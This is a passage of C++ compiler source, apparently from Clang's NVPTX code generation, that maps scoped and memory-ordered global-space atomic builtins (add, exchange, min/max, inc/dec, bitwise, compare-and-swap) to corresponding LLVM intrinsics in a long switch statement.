case NVPTX::BI__nvvm_atom_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui);
case NVPTX::BI__nvvm_atom_inc_global_ui:
case NVPTX::BI__nvvm_atom_inc_global_ul:
case NVPTX::BI__nvvm_atom_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i);
case NVPTX::BI__nvvm_atom_dec_global_ui:
case NVPTX::BI__nvvm_atom_dec_global_ul:
case NVPTX::BI__nvvm_atom_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i);
case NVPTX::BI__nvvm_atom_and_global_i:
case NVPTX::BI__nvvm_atom_and_global_l:
case NVPTX::BI__nvvm_atom_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i);
case NVPTX::BI__nvvm_atom_or_global_i:
case NVPTX::BI__nvvm_atom_or_global_l:
case NVPTX::BI__nvvm_atom_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i);
case NVPTX::BI__nvvm_atom_xor_global_i:
case NVPTX::BI__nvvm_atom_xor_global_l:
case NVPTX::BI__nvvm_atom_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i);
case NVPTX::BI__nvvm_atom_cas_global_i:
case NVPTX::BI__nvvm_atom_cas_global_l:
case NVPTX::BI__nvvm_atom_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i);
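// Relaxed global-space atomics with an explicit _cta / _sys scope.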
case NVPTX::BI__nvvm_atom_cta_add_global_i:
case NVPTX::BI__nvvm_atom_cta_add_global_l:
case NVPTX::BI__nvvm_atom_cta_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_add_global_i:
case NVPTX::BI__nvvm_atom_sys_add_global_l:
case NVPTX::BI__nvvm_atom_sys_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_sys);
case NVPTX::BI__nvvm_atom_cta_add_global_f:
case NVPTX::BI__nvvm_atom_cta_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_cta);
case NVPTX::BI__nvvm_atom_sys_add_global_f:
case NVPTX::BI__nvvm_atom_sys_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_sys);
case NVPTX::BI__nvvm_atom_cta_xchg_global_i:
case NVPTX::BI__nvvm_atom_cta_xchg_global_l:
case NVPTX::BI__nvvm_atom_cta_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_xchg_global_i:
case NVPTX::BI__nvvm_atom_sys_xchg_global_l:
case NVPTX::BI__nvvm_atom_sys_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_sys);
case NVPTX::BI__nvvm_atom_cta_max_global_i:
case NVPTX::BI__nvvm_atom_cta_max_global_l:
case NVPTX::BI__nvvm_atom_cta_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_cta);
case NVPTX::BI__nvvm_atom_cta_max_global_ui:
case NVPTX::BI__nvvm_atom_cta_max_global_ul:
case NVPTX::BI__nvvm_atom_cta_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_cta);
case NVPTX::BI__nvvm_atom_sys_max_global_i:
case NVPTX::BI__nvvm_atom_sys_max_global_l:
case NVPTX::BI__nvvm_atom_sys_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_sys);
case NVPTX::BI__nvvm_atom_sys_max_global_ui:
case NVPTX::BI__nvvm_atom_sys_max_global_ul:
case NVPTX::BI__nvvm_atom_sys_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_sys);
case NVPTX::BI__nvvm_atom_cta_min_global_i:
case NVPTX::BI__nvvm_atom_cta_min_global_l:
case NVPTX::BI__nvvm_atom_cta_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_cta);
case NVPTX::BI__nvvm_atom_cta_min_global_ui:
case NVPTX::BI__nvvm_atom_cta_min_global_ul:
case NVPTX::BI__nvvm_atom_cta_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_cta);
case NVPTX::BI__nvvm_atom_sys_min_global_i:
case NVPTX::BI__nvvm_atom_sys_min_global_l:
case NVPTX::BI__nvvm_atom_sys_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_sys);
case NVPTX::BI__nvvm_atom_sys_min_global_ui:
case NVPTX::BI__nvvm_atom_sys_min_global_ul:
case NVPTX::BI__nvvm_atom_sys_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_sys);
case NVPTX::BI__nvvm_atom_cta_inc_global_ui:
case NVPTX::BI__nvvm_atom_cta_inc_global_ul:
case NVPTX::BI__nvvm_atom_cta_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_cta);
case NVPTX::BI__nvvm_atom_cta_dec_global_ui:
case NVPTX::BI__nvvm_atom_cta_dec_global_ul:
case NVPTX::BI__nvvm_atom_cta_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_inc_global_ui:
case NVPTX::BI__nvvm_atom_sys_inc_global_ul:
case NVPTX::BI__nvvm_atom_sys_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_sys);
case NVPTX::BI__nvvm_atom_sys_dec_global_ui:
case NVPTX::BI__nvvm_atom_sys_dec_global_ul:
case NVPTX::BI__nvvm_atom_sys_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_sys);
case NVPTX::BI__nvvm_atom_cta_and_global_i:
case NVPTX::BI__nvvm_atom_cta_and_global_l:
case NVPTX::BI__nvvm_atom_cta_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_and_global_i:
case NVPTX::BI__nvvm_atom_sys_and_global_l:
case NVPTX::BI__nvvm_atom_sys_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_sys);
case NVPTX::BI__nvvm_atom_cta_or_global_i:
case NVPTX::BI__nvvm_atom_cta_or_global_l:
case NVPTX::BI__nvvm_atom_cta_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_or_global_i:
case NVPTX::BI__nvvm_atom_sys_or_global_l:
case NVPTX::BI__nvvm_atom_sys_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_sys);
case NVPTX::BI__nvvm_atom_cta_xor_global_i:
case NVPTX::BI__nvvm_atom_cta_xor_global_l:
case NVPTX::BI__nvvm_atom_cta_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_xor_global_i:
case NVPTX::BI__nvvm_atom_sys_xor_global_l:
case NVPTX::BI__nvvm_atom_sys_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_sys);
case NVPTX::BI__nvvm_atom_cta_cas_global_i:
case NVPTX::BI__nvvm_atom_cta_cas_global_l:
case NVPTX::BI__nvvm_atom_cta_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_cas_global_i:
case NVPTX::BI__nvvm_atom_sys_cas_global_l:
case NVPTX::BI__nvvm_atom_sys_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_sys);
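// Acquire-ordered atomics on the global address space (default scope).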
case NVPTX::BI__nvvm_atom_acquire_add_global_i:
case NVPTX::BI__nvvm_atom_acquire_add_global_l:
case NVPTX::BI__nvvm_atom_acquire_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_add_global_f:
case NVPTX::BI__nvvm_atom_acquire_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_acquire);
case NVPTX::BI__nvvm_atom_acquire_xchg_global_i:
case NVPTX::BI__nvvm_atom_acquire_xchg_global_l:
case NVPTX::BI__nvvm_atom_acquire_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_max_global_i:
case NVPTX::BI__nvvm_atom_acquire_max_global_l:
case NVPTX::BI__nvvm_atom_acquire_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_max_global_ui:
case NVPTX::BI__nvvm_atom_acquire_max_global_ul:
case NVPTX::BI__nvvm_atom_acquire_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_acquire);
case NVPTX::BI__nvvm_atom_acquire_min_global_i:
case NVPTX::BI__nvvm_atom_acquire_min_global_l:
case NVPTX::BI__nvvm_atom_acquire_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_min_global_ui:
case NVPTX::BI__nvvm_atom_acquire_min_global_ul:
case NVPTX::BI__nvvm_atom_acquire_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_acquire);
case NVPTX::BI__nvvm_atom_acquire_inc_global_ui:
case NVPTX::BI__nvvm_atom_acquire_inc_global_ul:
case NVPTX::BI__nvvm_atom_acquire_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_dec_global_ui:
case NVPTX::BI__nvvm_atom_acquire_dec_global_ul:
case NVPTX::BI__nvvm_atom_acquire_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_and_global_i:
case NVPTX::BI__nvvm_atom_acquire_and_global_l:
case NVPTX::BI__nvvm_atom_acquire_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_or_global_i:
case NVPTX::BI__nvvm_atom_acquire_or_global_l:
case NVPTX::BI__nvvm_atom_acquire_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_xor_global_i:
case NVPTX::BI__nvvm_atom_acquire_xor_global_l:
case NVPTX::BI__nvvm_atom_acquire_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_cas_global_i:
case NVPTX::BI__nvvm_atom_acquire_cas_global_l:
case NVPTX::BI__nvvm_atom_acquire_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_acquire);
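// Acquire-ordered global-space atomics with an explicit _cta / _sys scope.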
case NVPTX::BI__nvvm_atom_acquire_cta_add_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_add_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_add_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_add_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_add_global_f:
case NVPTX::BI__nvvm_atom_acquire_cta_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_add_global_f:
case NVPTX::BI__nvvm_atom_acquire_sys_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_max_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_max_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_max_global_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_max_global_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_max_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_max_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_max_global_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_max_global_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_min_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_min_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_min_global_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_min_global_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_min_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_min_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_min_global_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_min_global_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_inc_global_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_inc_global_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_dec_global_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_dec_global_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_inc_global_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_inc_global_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_dec_global_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_dec_global_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_and_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_and_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_and_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_and_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_or_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_or_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_or_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_or_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_xor_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_xor_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_xor_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_xor_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_cas_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_cas_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_cas_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_cas_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_acquire_sys);
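// Release-ordered atomics on the global address space (default scope).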
case NVPTX::BI__nvvm_atom_release_add_global_i:
case NVPTX::BI__nvvm_atom_release_add_global_l:
case NVPTX::BI__nvvm_atom_release_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_release);
case NVPTX::BI__nvvm_atom_release_add_global_f:
case NVPTX::BI__nvvm_atom_release_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_release);
case NVPTX::BI__nvvm_atom_release_xchg_global_i:
case NVPTX::BI__nvvm_atom_release_xchg_global_l:
case NVPTX::BI__nvvm_atom_release_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_release);
case NVPTX::BI__nvvm_atom_release_max_global_i:
case NVPTX::BI__nvvm_atom_release_max_global_l:
case NVPTX::BI__nvvm_atom_release_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_release);
case NVPTX::BI__nvvm_atom_release_max_global_ui:
case NVPTX::BI__nvvm_atom_release_max_global_ul:
case NVPTX::BI__nvvm_atom_release_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_release);
case NVPTX::BI__nvvm_atom_release_min_global_i:
case NVPTX::BI__nvvm_atom_release_min_global_l:
case NVPTX::BI__nvvm_atom_release_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_release);
case NVPTX::BI__nvvm_atom_release_min_global_ui:
case NVPTX::BI__nvvm_atom_release_min_global_ul:
case NVPTX::BI__nvvm_atom_release_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_release);
case NVPTX::BI__nvvm_atom_release_inc_global_ui:
case NVPTX::BI__nvvm_atom_release_inc_global_ul:
case NVPTX::BI__nvvm_atom_release_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_release);
case NVPTX::BI__nvvm_atom_release_dec_global_ui:
case NVPTX::BI__nvvm_atom_release_dec_global_ul:
case NVPTX::BI__nvvm_atom_release_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_release);
case NVPTX::BI__nvvm_atom_release_and_global_i:
case NVPTX::BI__nvvm_atom_release_and_global_l:
case NVPTX::BI__nvvm_atom_release_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_release);
case NVPTX::BI__nvvm_atom_release_or_global_i:
case NVPTX::BI__nvvm_atom_release_or_global_l:
case NVPTX::BI__nvvm_atom_release_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_release);
case NVPTX::BI__nvvm_atom_release_xor_global_i:
case NVPTX::BI__nvvm_atom_release_xor_global_l:
case NVPTX::BI__nvvm_atom_release_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_release);
case NVPTX::BI__nvvm_atom_release_cas_global_i:
case NVPTX::BI__nvvm_atom_release_cas_global_l:
case NVPTX::BI__nvvm_atom_release_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_release);
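// Release-ordered global-space atomics with an explicit _cta / _sys scope.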
case NVPTX::BI__nvvm_atom_release_cta_add_global_i:
case NVPTX::BI__nvvm_atom_release_cta_add_global_l:
case NVPTX::BI__nvvm_atom_release_cta_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_add_global_i:
case NVPTX::BI__nvvm_atom_release_sys_add_global_l:
case NVPTX::BI__nvvm_atom_release_sys_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_add_global_f:
case NVPTX::BI__nvvm_atom_release_cta_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_add_global_f:
case NVPTX::BI__nvvm_atom_release_sys_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_xchg_global_i:
case NVPTX::BI__nvvm_atom_release_cta_xchg_global_l:
case NVPTX::BI__nvvm_atom_release_cta_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_xchg_global_i:
case NVPTX::BI__nvvm_atom_release_sys_xchg_global_l:
case NVPTX::BI__nvvm_atom_release_sys_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_max_global_i:
case NVPTX::BI__nvvm_atom_release_cta_max_global_l:
case NVPTX::BI__nvvm_atom_release_cta_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_max_global_ui:
case NVPTX::BI__nvvm_atom_release_cta_max_global_ul:
case NVPTX::BI__nvvm_atom_release_cta_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_max_global_i:
case NVPTX::BI__nvvm_atom_release_sys_max_global_l:
case NVPTX::BI__nvvm_atom_release_sys_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_max_global_ui:
case NVPTX::BI__nvvm_atom_release_sys_max_global_ul:
case NVPTX::BI__nvvm_atom_release_sys_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_min_global_i:
case NVPTX::BI__nvvm_atom_release_cta_min_global_l:
case NVPTX::BI__nvvm_atom_release_cta_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_min_global_ui:
case NVPTX::BI__nvvm_atom_release_cta_min_global_ul:
case NVPTX::BI__nvvm_atom_release_cta_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_min_global_i:
case NVPTX::BI__nvvm_atom_release_sys_min_global_l:
case NVPTX::BI__nvvm_atom_release_sys_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_min_global_ui:
case NVPTX::BI__nvvm_atom_release_sys_min_global_ul:
case NVPTX::BI__nvvm_atom_release_sys_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_inc_global_ui:
case NVPTX::BI__nvvm_atom_release_cta_inc_global_ul:
case NVPTX::BI__nvvm_atom_release_cta_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_dec_global_ui:
case NVPTX::BI__nvvm_atom_release_cta_dec_global_ul:
case NVPTX::BI__nvvm_atom_release_cta_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_inc_global_ui:
case NVPTX::BI__nvvm_atom_release_sys_inc_global_ul:
case NVPTX::BI__nvvm_atom_release_sys_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_dec_global_ui:
case NVPTX::BI__nvvm_atom_release_sys_dec_global_ul:
case NVPTX::BI__nvvm_atom_release_sys_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_and_global_i:
case NVPTX::BI__nvvm_atom_release_cta_and_global_l:
case NVPTX::BI__nvvm_atom_release_cta_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_and_global_i:
case NVPTX::BI__nvvm_atom_release_sys_and_global_l:
case NVPTX::BI__nvvm_atom_release_sys_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_or_global_i:
case NVPTX::BI__nvvm_atom_release_cta_or_global_l:
case NVPTX::BI__nvvm_atom_release_cta_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_or_global_i:
case NVPTX::BI__nvvm_atom_release_sys_or_global_l:
case NVPTX::BI__nvvm_atom_release_sys_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_xor_global_i:
case NVPTX::BI__nvvm_atom_release_cta_xor_global_l:
case NVPTX::BI__nvvm_atom_release_cta_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_xor_global_i:
case NVPTX::BI__nvvm_atom_release_sys_xor_global_l:
case NVPTX::BI__nvvm_atom_release_sys_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_cas_global_i:
case NVPTX::BI__nvvm_atom_release_cta_cas_global_l:
case NVPTX::BI__nvvm_atom_release_cta_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_cas_global_i:
case NVPTX::BI__nvvm_atom_release_sys_cas_global_l:
case NVPTX::BI__nvvm_atom_release_sys_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_release_sys);
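// Acquire-release atomics on the global address space (default scope).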
case NVPTX::BI__nvvm_atom_acq_rel_add_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_add_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_add_global_f:
case NVPTX::BI__nvvm_atom_acq_rel_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_xchg_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_xchg_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_max_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_max_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_max_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_max_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_max_global_ull:
